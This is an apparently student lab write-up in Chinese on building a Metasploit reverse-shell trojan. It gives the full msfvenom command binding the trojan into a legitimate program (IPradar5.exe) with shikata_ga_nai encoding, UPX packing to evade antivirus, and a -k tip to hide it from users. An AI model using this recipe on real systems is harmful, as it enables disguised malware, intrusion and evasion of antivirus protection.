码迷,mamicode.com
首页 > Web开发 > 详细

Metasploit实现木马生成、捆绑、免杀

时间:2017-12-07 00:45:29      阅读:1682      评论:0      收藏:0      [点我收藏+]

标签:ima   一点   文件的   exe   代码   推荐   win7   关注   image   

Meatsploit介绍

Metasploit是一款优秀的开源(!= 完全免费)渗透测试框架平台,在该平台下可以方便的实施渗透测试,Meatsploit具有繁多的接口、模块等等,甚至允许用户自己编写自己的模块使用。在Metasploit框架下可以方便的实现木马的生成、捆绑、免杀。实验楼网站存在此节课程但是是收费的,How frustrating,,,,so,,,,,:)

0X01选择攻击载荷

首先,开启终端,键入:“msfconsole“,进入metasploit控制台。

技术分享图片

键入“show payloads",查看所有可用的攻击载荷的信息。
下面列出的载荷信息是所有可以使用的攻击载荷
技术分享图片

我使用的载荷名为:shell_reverse_tcp,是一个简单的反弹shell程序,功能是连接肉鸡(系统为windows系统)的命令行。当然也可以使用其它的攻击载荷,实现不同的功能。
技术分享图片

0X02选择被捆绑文件

本实验的实现的功能之一就是让木马捆绑在一个其它的可执行文件上,以便于木马的感染和传播。其实Meatsploit自带有程序模板,其位置在data/templates/template.exe。虽然这个模板经常会更新,但是其仍是各大反病毒木马厂商的关注重点。为了更好地实现免杀,我自己选择一个待捆绑程序。我选择可程序模板是”IP雷达“,IP雷达是一款常用且优秀的系统资源监控程序。(关于被捆绑程序的选择是随机的,侵删)
下图中qqwry.dat是IP雷达的IP地址库,与本实验无关。
技术分享图片

0X03关于免杀

免杀是一门非常重要的技术(其它技术也很重要),我想一个真正的Hacker不会仅仅满足于使用别人的软件来进行免杀。自己写的壳再怎么低级也比直接从网上找到的加壳工具安全的多。常见的免杀方式有:修改特征码/修改程序入口点/花指令/加壳等等。(关于免杀推荐《黑客免杀攻防》——任晓珲,本书堪称入门/提升的经典之作,该书作者前是邪恶八进制的一员哦:))
回归正题,在Meatsploit框架下免杀的方式之一就是使用MSF编码器。其功能是对我们攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。可以在终端键入msfvenom -l encoders来查看所有的可用的编码方式。注意并不是所有的编码方式都在windows系统上可用。这里我选则的编码方式是:

技术分享图片

注意并不是所有的编码方式都在windows系统上可用。这里我选则的编码方式是:

技术分享图片

0X04木马的生成/捆绑/免杀

实验环境:
攻击机IP:192.168.159.134 系统:Kali linux
靶机IP:169.254.113.77 系统:win7(安全软件为:360、COMODO )

生成木马/捆绑/免杀操作如下:
技术分享图片

msfvenom -p windows/shell_reverse_tcp 意为使用shell_reverse_tcp攻击载荷
LHOST=192.168.159.134 此步是设置攻击者IP地址
LPORT=8080 此步是设置攻击者的监听端口,用于接收木马的链接请求
-e x86/shikata_ga_nai 此步意为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码,上文有讲
-x IPradar5.exe 此步意为将木马捆绑在指定的可执行程序模版上,此处为IPradar5.exe
-i 5 此处意为使用刚才设定的编码方式对目标进行5次编码(多次编码理论上来讲有助于免杀,但是也不一定,毕竟杀软不是白收费的。。。。)
-f exe 此步意为指定MSF编码器输出格式为exe
-o /root/Desktop/backdoor.exe 此步意为指定处理完毕后的文件输出路径

技术分享图片

至此木马程序生成/捆绑/免杀就都都完成了,,,,,,四不四很简单。。。。赶脚完全木有技术含量的说。。。。

下面测试:
先设置msf,将其设置为监听8080,等待木马的链接
技术分享图片
。。。。。。。。
这就尴尬了。。。。
技术分享图片

技术分享图片

并不甘心。。。。再对刚才的程序进行加壳处理
终端键入upx,参看upx加壳软件参数
技术分享图片
键入命令:upx -5 backdoor.exe 即对backdoor.exe进行加壳(此处为压缩处理),加壳的不便之处就是会改变源文件的大小,有经验的安全人员很容易发现这点差别。。。。重命名为1backdoor.exe
技术分享图片
重新使用360扫描
结果狠尴尬。。。。
技术分享图片
360的病毒库看来还是不错的。。。。。
将加壳后的文件上传viscan进行云查杀
技术分享图片
可见公开的免杀工具并不是那么的靠谱,而且我发现在viscan的杀毒引擎中,奇虎360的引擎版本才是1.0.1,,,可见安全公司并不是白吃干饭的额。。。。

还有一点说明一下,以上对木马的生成绑定操作,执行含有木马的宿主程序时,宿主程序并不会启动,如果想隐蔽木马文件让用户察觉不出来宿主程序有问题的话,则要在生成木马的那段代码中添加 -k 选项,此意为攻击载荷会在一个独立的进程中启动而源宿主程序的运行不受影响。

实验到此结束
同实验者:杨晓桐20179202

Metasploit实现木马生成、捆绑、免杀

标签:ima   一点   文件的   exe   代码   推荐   win7   关注   image   

原文地址:http://www.cnblogs.com/ghost00011011/p/7994396.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!